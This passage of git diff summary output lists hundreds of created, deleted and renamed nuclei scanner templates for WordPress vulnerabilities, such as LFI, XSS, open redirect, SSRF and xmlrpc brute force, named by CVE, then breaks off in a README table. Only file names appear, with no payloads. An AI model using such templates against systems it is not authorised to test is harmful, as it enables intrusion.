nuclei-templates/wordpress/CVE-2022-2846.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-3463.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-3600.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-3846.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2022-3852.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-4120.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-45808.yaml create mode 100644 nuclei-templates/wordpress/CVE-2022-4971.yaml create mode 100644 nuclei-templates/wordpress/CVE-2023-0058.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-0403.yaml create mode 100644 nuclei-templates/wordpress/CVE-2023-0899.yaml create mode 100644 nuclei-templates/wordpress/CVE-2023-1282.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-1912.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-2488.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-3134.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-34020.yaml create mode 100644 nuclei-templates/wordpress/CVE-2023-3452.yaml create mode 100644 nuclei-templates/wordpress/CVE-2023-40600.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-4620.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-47684.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-5307.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-5604.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-6627.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2023-7200.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2024-0233.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2024-0236.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2024-0237.yaml create mode 100644 nuclei-templates/wordpress/CVE-2024-0324.yaml create mode 100644 nuclei-templates/wordpress/CVE-2024-11230.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2024-2879.yaml create mode 100644 nuclei-templates/wordpress/CVE-2024-3495.yaml create mode 100644 nuclei-templates/wordpress/CVE-2024-4382.yaml create mode 100644 nuclei-templates/wordpress/CVE-2024-5932.yaml delete mode 100644 nuclei-templates/wordpress/CVE-2024-8529.yaml create mode 100644 nuclei-templates/wordpress/CVE-2024-9156.yaml create mode 100644 nuclei-templates/wordpress/WP_json_caching.yaml create mode 100644 nuclei-templates/wordpress/accessibility-helper-xss-18.yaml delete mode 100644 nuclei-templates/wordpress/accessibility-helper-xss.yaml create mode 100644 nuclei-templates/wordpress/ad-widget-lfi-124.yaml delete mode 100644 nuclei-templates/wordpress/ad-widget-lfi.yaml rename nuclei-templates/wordpress/{admin-word-count-column-lfi-81.yaml => admin-word-count-column-lfi.yaml} (100%) create mode 100644 nuclei-templates/wordpress/advanced-access-manager-lfi-118.yaml delete mode 100644 nuclei-templates/wordpress/age-gate-open-redirect-207.yaml create mode 100644 nuclei-templates/wordpress/age-gate-open-redirect.yaml rename nuclei-templates/wordpress/{alfacgiapi-wordpress-257.yaml => alfacgiapi-wordpress.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/aspose-file-download-558.yaml create mode 100644 nuclei-templates/wordpress/aspose-file-download-561.yaml create mode 100644 nuclei-templates/wordpress/aspose-pdf-file-download-568.yaml create mode 100644 nuclei-templates/wordpress/booked.yaml delete mode 100644 nuclei-templates/wordpress/brandfolder-lfi-776.yaml create mode 100644 nuclei-templates/wordpress/brandfolder-lfi-778.yaml create mode 100644 nuclei-templates/wordpress/brandfolder-open-redirect-779.yaml delete mode 100644 nuclei-templates/wordpress/brandfolder-open-redirect-782.yaml rename nuclei-templates/{Other => wordpress}/cherry-file-download.yaml (100%) rename nuclei-templates/wordpress/{cherry-lfi-903.yaml => cherry-lfi.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/churchope-lfi-915.yaml create mode 100644 nuclei-templates/wordpress/churchope-lfi.yaml delete mode 100644 nuclei-templates/wordpress/cve-2011-4618-2069.yaml create mode 100644 nuclei-templates/wordpress/cve-2011-4618.yaml create mode 100644 nuclei-templates/wordpress/cve-2011-4624-2080.yaml create mode 100644 nuclei-templates/wordpress/cve-2011-5106-2097.yaml delete mode 100644 nuclei-templates/wordpress/cve-2011-5106.yaml delete mode 100644 nuclei-templates/wordpress/cve-2011-5107.yaml create mode 100644 nuclei-templates/wordpress/cve-2011-5179-2109.yaml delete mode 100644 nuclei-templates/wordpress/cve-2012-0901-2141.yaml delete mode 100644 nuclei-templates/wordpress/cve-2012-1835-2172.yaml create mode 100644 nuclei-templates/wordpress/cve-2012-2371-2175.yaml delete mode 100644 nuclei-templates/wordpress/cve-2012-4242-2183.yaml create mode 100644 nuclei-templates/wordpress/cve-2012-4242.yaml create mode 100644 nuclei-templates/wordpress/cve-2012-4273-2197.yaml create mode 100644 nuclei-templates/wordpress/cve-2012-4768.yaml create mode 100644 nuclei-templates/wordpress/cve-2012-5913.yaml delete mode 100644 nuclei-templates/wordpress/cve-2013-2287.yaml create mode 100644 nuclei-templates/wordpress/cve-2013-4117-2265.yaml rename nuclei-templates/wordpress/{cve-2013-4625-2269.yaml => cve-2013-4625-2266.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2013-7240.yaml rename nuclei-templates/wordpress/{cve-2014-4513-2341.yaml => cve-2014-4513.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2014-4536.yaml rename nuclei-templates/wordpress/{cve-2014-4550-2364.yaml => cve-2014-4550-2367.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2014-4561.yaml create mode 100644 nuclei-templates/wordpress/cve-2014-4592-2377.yaml create mode 100644 nuclei-templates/wordpress/cve-2014-4940-2381.yaml delete mode 100644 nuclei-templates/wordpress/cve-2014-4940-2382.yaml create mode 100644 nuclei-templates/wordpress/cve-2014-4942.yaml create mode 100644 nuclei-templates/wordpress/cve-2014-9094-2420.yaml delete mode 100644 nuclei-templates/wordpress/cve-2014-9444-2426.yaml create mode 100644 nuclei-templates/wordpress/cve-2014-9444-2427.yaml create mode 100644 nuclei-templates/wordpress/cve-2015-1000012-2461.yaml create mode 100644 nuclei-templates/wordpress/cve-2015-2807-2500.yaml delete mode 100644 nuclei-templates/wordpress/cve-2015-2807-2501.yaml create mode 100644 nuclei-templates/wordpress/cve-2015-4414.yaml delete mode 100644 nuclei-templates/wordpress/cve-2015-5461-2556.yaml delete mode 100644 nuclei-templates/wordpress/cve-2015-5471-2558.yaml create mode 100644 nuclei-templates/wordpress/cve-2015-5471-2560.yaml delete mode 100644 nuclei-templates/wordpress/cve-2015-9414-2628.yaml create mode 100644 nuclei-templates/wordpress/cve-2015-9414.yaml rename nuclei-templates/{CVE-2015/CVE-2015-9480.yaml => wordpress/cve-2015-9480-2629.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2016-1000126-2643.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000127-2644.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000127-2647.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000129-2655.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000129.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000130.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000131-2664.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000131-2665.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000132-2668.yaml rename nuclei-templates/wordpress/{cve-2016-1000133-2671.yaml => cve-2016-1000133-2673.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2016-1000135-2685.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000136.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000139-2699.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000139-2702.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000140-2706.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000141.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000142-2712.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000143-2717.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000146-2720.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000149-2728.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-1000152-2729.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-1000152.yaml create mode 100644 nuclei-templates/wordpress/cve-2016-10033-2745.yaml delete mode 100644 nuclei-templates/wordpress/cve-2016-10956-2760.yaml rename nuclei-templates/wordpress/{CVE-2017-1000170-2842.yaml => cve-2017-1000170-2842.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2017-17059.yaml rename nuclei-templates/wordpress/{CVE-2017-17451-2983.yaml => cve-2017-17451.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2017-18536-2995.yaml delete mode 100644 nuclei-templates/wordpress/cve-2017-18598-2997.yaml create mode 100644 nuclei-templates/wordpress/cve-2017-5487-3024.yaml create mode 100644 nuclei-templates/wordpress/cve-2017-9288-3086.yaml rename nuclei-templates/wordpress/{CVE-2018-18069-3425.yaml => cve-2018-18069-3425.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2018-18069-3429.yaml rename nuclei-templates/wordpress/{cve-2018-20462-3492.yaml => cve-2018-20462-3494.yaml} (100%) rename nuclei-templates/wordpress/{CVE-2018-3810-3558.yaml => cve-2018-3810-3558.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2018-8719.yaml create mode 100644 nuclei-templates/wordpress/cve-2018-9118-3653.yaml delete mode 100644 nuclei-templates/wordpress/cve-2018-9118.yaml create mode 100644 nuclei-templates/wordpress/cve-2019-10692(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2019-14205-3827.yaml create mode 100644 nuclei-templates/wordpress/cve-2019-15713-3887.yaml rename nuclei-templates/{CVE-2019/CVE-2019-15858.yaml => wordpress/cve-2019-15858-3892.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2019-15858.yaml delete mode 100644 nuclei-templates/wordpress/cve-2019-16525.yaml create mode 100644 nuclei-templates/wordpress/cve-2019-16931(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2019-16932(1).yaml delete mode 100644 nuclei-templates/wordpress/cve-2019-16932.yaml delete mode 100644 nuclei-templates/wordpress/cve-2019-19134-4031.yaml create mode 100644 nuclei-templates/wordpress/cve-2019-19134.yaml delete mode 100644 nuclei-templates/wordpress/cve-2019-20210(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2019-20210.yaml delete mode 100644 nuclei-templates/wordpress/cve-2019-6112-4178.yaml create mode 100644 nuclei-templates/wordpress/cve-2019-6112.yaml delete mode 100644 nuclei-templates/wordpress/cve-2019-6715-4184.yaml create mode 100644 nuclei-templates/wordpress/cve-2019-6715-4189.yaml create mode 100644 nuclei-templates/wordpress/cve-2019-9618-4297.yaml delete mode 100644 nuclei-templates/wordpress/cve-2019-9978-4331.yaml delete mode 100644 nuclei-templates/wordpress/cve-2020-11738-4430.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-11930.yaml delete mode 100644 nuclei-templates/wordpress/cve-2020-13700-4510.yaml rename nuclei-templates/wordpress/{CVE-2020-13700-4512.yaml => cve-2020-13700-4512.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2020-14092-4536.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-17362-4658.yaml delete mode 100644 nuclei-templates/wordpress/cve-2020-17362-4659.yaml rename nuclei-templates/wordpress/{CVE-2020-24186-4795.yaml => cve-2020-24186-4795.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2020-24186-4797.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-24312-4805.yaml rename nuclei-templates/wordpress/{cve-2020-24312-4810.yaml => cve-2020-24312-4806.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2020-25213.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-26153-4913.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-28976-4989.yaml delete mode 100644 nuclei-templates/wordpress/cve-2020-28976-4990.yaml delete mode 100644 nuclei-templates/wordpress/cve-2020-29395-5002.yaml rename nuclei-templates/wordpress/{CVE-2020-35489-5039.yaml => cve-2020-35489-5039.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2020-35489-5044.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-35489.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-35749-5075.yaml rename nuclei-templates/wordpress/{CVE-2020-35951-5108.yaml => cve-2020-35951-5108.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2020-35951-5109.yaml create mode 100644 nuclei-templates/wordpress/cve-2020-35951-5110.yaml rename nuclei-templates/wordpress/{cve-2020-9043.yaml => cve-2020-9043(1).yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2021-21389-5514.yaml rename nuclei-templates/wordpress/{CVE-2021-24146-5630.yaml => cve-2021-24146-5631.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2021-24235-5653.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24237-5656.yaml rename nuclei-templates/wordpress/{CVE-2021-24245(1).yaml => cve-2021-24245.yaml} (100%) rename nuclei-templates/wordpress/{CVE-2021-24275-5661.yaml => cve-2021-24275-5661.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2021-24276-5666.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24278-5668.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24284(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24286.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24288-5678.yaml rename nuclei-templates/wordpress/{cve-2021-24300(1).yaml => cve-2021-24300.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2021-24320-5699.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24320.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24335-5701.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24335-5705.yaml rename nuclei-templates/wordpress/{cve-2021-24342-5715.yaml => cve-2021-24342.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2021-24364-5719.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24387-5726.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24389-5731.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24389.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24406-5737.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24495-5747.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24499-5756.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24510-5758.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24510-5759.yaml rename nuclei-templates/wordpress/{CVE-2021-24746.yaml => cve-2021-24746-5760.yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2021-24750-5762.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24762-5766.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24838-5767.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24891(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2021-24926-5771.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24947-5775.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-24991.yaml rename nuclei-templates/wordpress/{CVE-2021-25008(1).yaml => cve-2021-25008.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2021-25028.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-25033-5788.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-25052-5789.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-25052-5790.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-25055-5792.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-25055.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-25063.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-25075(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2021-25085(1).yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-25085.yaml rename nuclei-templates/wordpress/{CVE-2021-25118.yaml => cve-2021-25118.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/cve-2021-25120(1).yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-34640.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-34643-6239.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-38314.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-39320-6334.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-39320-6336.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-39322-6338.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-39322-6339.yaml create mode 100644 nuclei-templates/wordpress/cve-2021-39327-6342.yaml delete mode 100644 nuclei-templates/wordpress/cve-2021-39350-6343.yaml create mode 100644 nuclei-templates/wordpress/cve-2022-0148-6605.yaml create mode 100644 nuclei-templates/wordpress/cve-2022-0165(1).yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0208.yaml create mode 100644 nuclei-templates/wordpress/cve-2022-0218-6612.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0218-6613.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0288(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2022-0346.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0381-6626.yaml create mode 100644 nuclei-templates/wordpress/cve-2022-0381.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0422.yaml create mode 100644 nuclei-templates/wordpress/cve-2022-0591-6636.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0594.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0595.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0599.yaml create mode 100644 nuclei-templates/wordpress/cve-2022-0952(1).yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-0952.yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-1054(1).yaml delete mode 100644 nuclei-templates/wordpress/cve-2022-1119(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2022-1119.yaml rename nuclei-templates/wordpress/{cve-2022-1386(1).yaml => cve-2022-1386.yaml} (100%) rename nuclei-templates/wordpress/{cve-2022-1609-6655.yaml => cve-2022-1609(1).yaml} (100%) create mode 100644 nuclei-templates/wordpress/cve-2022-1904(1).yaml create mode 100644 nuclei-templates/wordpress/cve-2022-27849-6740.yaml rename nuclei-templates/{CVE-2022/CVE-2022-29455.yaml => wordpress/cve-2022-29455.yaml} (100%) rename nuclei-templates/wordpress/{db-backup-lfi.yaml => db-backup-lfi-6776.yaml} (100%) create mode 100644 nuclei-templates/wordpress/diarise-theme-lfi-6992.yaml rename nuclei-templates/wordpress/{dzs-zoomsounds-listing.yaml => dzs-zoomsounds-listing-7147.yaml} (100%) create mode 100644 nuclei-templates/wordpress/easy-media-gallery-pro-listing-7152.yaml delete mode 100644 nuclei-templates/wordpress/eatery-restaurant-open-redirect-7158.yaml create mode 100644 nuclei-templates/wordpress/elementorpage-open-redirect.yaml rename nuclei-templates/wordpress/{hb-audio-lfi-7913.yaml => hb-audio-lfi-7911.yaml} (100%) rename nuclei-templates/wordpress/{hide-security-enhancer-lfi-7951.yaml => hide-security-enhancer-lfi.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/learnpress.yaml rename nuclei-templates/wordpress/{music-store-open-redirect.yaml => music-store-open-redirect-8972.yaml} (100%) create mode 100644 nuclei-templates/wordpress/my-chatbot-xss-8978.yaml delete mode 100644 nuclei-templates/wordpress/my-chatbot-xss-8979.yaml create mode 100644 nuclei-templates/wordpress/nativechurch-wp-theme-lfd-9003.yaml delete mode 100644 nuclei-templates/wordpress/nativechurch-wp-theme-lfd.yaml create mode 100644 nuclei-templates/wordpress/nexus.yaml rename nuclei-templates/wordpress/{ninjaform-open-redirect-9134.yaml => ninjaform-open-redirect.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/noptin-open-redirect.yaml delete mode 100644 nuclei-templates/wordpress/pieregister-open-redirect-9577.yaml create mode 100644 nuclei-templates/wordpress/pieregister-open-redirect-9579.yaml create mode 100644 nuclei-templates/wordpress/pieregister-plugin-open-redirect.yaml create mode 100644 nuclei-templates/wordpress/platform.yaml rename nuclei-templates/wordpress/{shortcode-lfi.yaml => shortcode-lfi-10214.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/signatures-10248.yaml rename nuclei-templates/wordpress/{simple-image-manipulator-lfi-10282.yaml => simple-image-manipulator-lfi-10281.yaml} (100%) create mode 100644 nuclei-templates/wordpress/sniplets-lfi-10341.yaml delete mode 100644 nuclei-templates/wordpress/sniplets-lfi-10343.yaml create mode 100644 nuclei-templates/wordpress/ultimatemember-open-redirect-10877.yaml delete mode 100644 nuclei-templates/wordpress/video-synchro-pdf-lfi-11006.yaml create mode 100644 nuclei-templates/wordpress/video-synchro-pdf-lfi-11007.yaml rename nuclei-templates/wordpress/{w3c-total-cache-ssrf-11081.yaml => w3c-total-cache-ssrf-11080.yaml} (100%) rename nuclei-templates/{Other => wordpress}/wordpress-affiliatewp-log-11244.yaml (95%) delete mode 100644 nuclei-templates/wordpress/wordpress-bbpress-plugin-listing-11247.yaml rename nuclei-templates/{Other/wordpress-db-repair.yaml => wordpress/wordpress-db-repair-11255.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wordpress-detect-11261.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-directory-listing.yaml create mode 100644 nuclei-templates/wordpress/wordpress-emergency-script-11274.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-emergency-script-11277.yaml create mode 100644 nuclei-templates/wordpress/wordpress-git-config-11279.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml create mode 100644 nuclei-templates/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml rename nuclei-templates/wordpress/{wordpress-infinitewp-auth-bypass-11285.yaml => wordpress-infinitewp-auth-bypass-11287.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wordpress-installer-log-11290.yaml create mode 100644 nuclei-templates/wordpress/wordpress-installer-log-11292.yaml rename nuclei-templates/wordpress/{wordpress-login.yaml => wordpress-login-11295.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wordpress-plugins-detect.yaml create mode 100644 nuclei-templates/wordpress/wordpress-plugins2.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-redirection-plugin-listing-11306.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-rest-dosviacp.yaml create mode 100644 nuclei-templates/wordpress/wordpress-theme-detect.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-tmm-db-migrate-11317.yaml create mode 100644 nuclei-templates/wordpress/wordpress-tmm-db-migrate-11320.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-total-upkeep-backup-download-11324.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-user-enum-11330.yaml create mode 100644 nuclei-templates/wordpress/wordpress-weak-credentials-11336.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-weak-credentials.yaml create mode 100644 nuclei-templates/wordpress/wordpress-woocommerce-listing-11341.yaml rename nuclei-templates/wordpress/{wordpress-wordfence-lfi-11348.yaml => wordpress-wordfence-lfi.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml rename nuclei-templates/{Other => wordpress}/wordpress-wordfence-xss-11357.yaml (100%) delete mode 100644 nuclei-templates/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml create mode 100644 nuclei-templates/wordpress/wordpress-xmlrpc-brute-force.yaml delete mode 100644 nuclei-templates/wordpress/wordpress-zebra-form-xss-11379.yaml create mode 100644 nuclei-templates/wordpress/wordpress-zebra-form-xss.yaml delete mode 100644 nuclei-templates/wordpress/wp-123contactform-plugin-listing-11400.yaml create mode 100644 nuclei-templates/wordpress/wp-adaptive-xss-11403.yaml delete mode 100644 nuclei-templates/wordpress/wp-adaptive-xss-11404.yaml delete mode 100644 nuclei-templates/wordpress/wp-altair-listing-11406.yaml create mode 100644 nuclei-templates/wordpress/wp-altair-listing.yaml delete mode 100644 nuclei-templates/wordpress/wp-church-admin-xss-11422.yaml create mode 100644 nuclei-templates/wordpress/wp-church-admin-xss.yaml rename nuclei-templates/wordpress/{wp-custom-tables-xss-11435.yaml => wp-custom-tables-xss.yaml} (100%) create mode 100644 nuclei-templates/wordpress/wp-email-subscribers-listing-11440.yaml delete mode 100644 nuclei-templates/wordpress/wp-email-subscribers-listing-11442.yaml rename nuclei-templates/{Other => wordpress}/wp-enabled-registration.yaml (96%) create mode 100644 nuclei-templates/wordpress/wp-finder-xss-11450.yaml rename nuclei-templates/wordpress/{wp-flagem-xss.yaml => wp-flagem-xss-11451.yaml} (100%) create mode 100644 nuclei-templates/wordpress/wp-grimag-open-redirect-11458.yaml delete mode 100644 nuclei-templates/wordpress/wp-grimag-open-redirect-11461.yaml rename nuclei-templates/{Other/wp-gtranslate-open-redirect.yaml => wordpress/wp-gtranslate-open-redirect-11465.yaml} (100%) rename nuclei-templates/{Other/wp-idx-broker-platinum-listing.yaml => wordpress/wp-idx-broker-platinum-listing-11471.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wp-install-11475.yaml create mode 100644 nuclei-templates/wordpress/wp-install.yaml create mode 100644 nuclei-templates/wordpress/wp-iwp-client-listing-11476.yaml rename nuclei-templates/{Other/wp-javospot-lfi.yaml => wordpress/wp-javospot-lfi-11482.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wp-knews-xss-11483.yaml create mode 100644 nuclei-templates/wordpress/wp-knews-xss-11484.yaml delete mode 100644 nuclei-templates/wordpress/wp-license-file.yaml rename nuclei-templates/{Other => wordpress}/wp-mail-smtp-listing.yaml (91%) delete mode 100644 nuclei-templates/wordpress/wp-memphis-documents-library-lfi-11495.yaml create mode 100644 nuclei-templates/wordpress/wp-memphis-documents-library-lfi.yaml rename nuclei-templates/wordpress/{wp-mstore-plugin-listing.yaml => wp-mstore-plugin-listing-11500.yaml} (100%) create mode 100644 nuclei-templates/wordpress/wp-multiple-theme-ssrf-11510.yaml delete mode 100644 nuclei-templates/wordpress/wp-nextgen-xss-11514.yaml create mode 100644 nuclei-templates/wordpress/wp-nextgen-xss-11516.yaml rename nuclei-templates/wordpress/{wp-phpfreechat-xss-11528.yaml => wp-phpfreechat-xss-11527.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml create mode 100644 nuclei-templates/wordpress/wp-plugin-1-flashgallery-listing-11532.yaml create mode 100644 nuclei-templates/wordpress/wp-plugin-lifterlms-11536.yaml delete mode 100644 nuclei-templates/wordpress/wp-plugin-lifterlms.yaml rename nuclei-templates/wordpress/{wp-plugin-utlimate-member-11539.yaml => wp-plugin-utlimate-member-11541.yaml} (100%) create mode 100644 nuclei-templates/wordpress/wp-prostore-open-redirect-11549.yaml delete mode 100644 nuclei-templates/wordpress/wp-prostore-open-redirect-11550.yaml create mode 100644 nuclei-templates/wordpress/wp-securimage-xss-11557.yaml delete mode 100644 nuclei-templates/wordpress/wp-securimage-xss.yaml delete mode 100644 nuclei-templates/wordpress/wp-security-open-redirect-11561.yaml create mode 100644 nuclei-templates/wordpress/wp-security-open-redirect.yaml rename nuclei-templates/wordpress/{wp-sfwd-lms-listing-11565.yaml => wp-sfwd-lms-listing.yaml} (100%) rename nuclei-templates/{Other/wp-simple-fields-lfi.yaml => wordpress/wp-simple-fields-lfi-11570.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wp-socialfit-xss-11578.yaml create mode 100644 nuclei-templates/wordpress/wp-socialfit-xss-11582.yaml create mode 100644 nuclei-templates/wordpress/wp-spot-premium-lfi-11584.yaml delete mode 100644 nuclei-templates/wordpress/wp-spot-premium-lfi.yaml create mode 100644 nuclei-templates/wordpress/wp-super-forms-11585.yaml delete mode 100644 nuclei-templates/wordpress/wp-super-forms-11588.yaml create mode 100644 nuclei-templates/wordpress/wp-tinymce-lfi-11589.yaml delete mode 100644 nuclei-templates/wordpress/wp-tinymce-lfi-11591.yaml create mode 100644 nuclei-templates/wordpress/wp-tutor-lfi-11596.yaml rename nuclei-templates/{Other => wordpress}/wp-upload-data-11602.yaml (100%) rename nuclei-templates/wordpress/{wp-whmcs-xss-11613.yaml => wp-whmcs-xss.yaml} (100%) create mode 100644 nuclei-templates/wordpress/wp-woocommerce-email-verification-11619.yaml rename nuclei-templates/wordpress/{wp-woocommerce-file-download-11620.yaml => wp-woocommerce-file-download.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wp-xmlrpc-11629.yaml delete mode 100644 nuclei-templates/wordpress/wp-xmlrpc-brute-force-11624.yaml rename nuclei-templates/{Other/wp-xmlrpc-pingback-detection.yaml => wordpress/wp-xmlrpc-pingback-detection-11627.yaml} (100%) rename nuclei-templates/{Other => wordpress}/wpconfig-aws-keys.yaml (91%) delete mode 100644 nuclei-templates/wordpress/wpdm-cache-session-11436.yaml create mode 100644 nuclei-templates/wordpress/wpdm-cache-session-11438.yaml rename nuclei-templates/wordpress/{wpmudev-pub-keys-11504.yaml => wpmudev-pub-keys-11507.yaml} (100%) rename nuclei-templates/wordpress/{wptouch-open-redirect-11592.yaml => wptouch-open-redirect-11594.yaml} (100%) delete mode 100644 nuclei-templates/wordpress/wptouch-plugin-open-redirect.yaml diff --git a/README.md b/README.md index bc500d349c..d5efda85fe 100644 --- a/README.md +++ b/README.md @@ -14,50 +14,74 @@ | CVE-2011 | 14 | | CVE-2012 | 28 | | CVE-2013 | 23 | -| 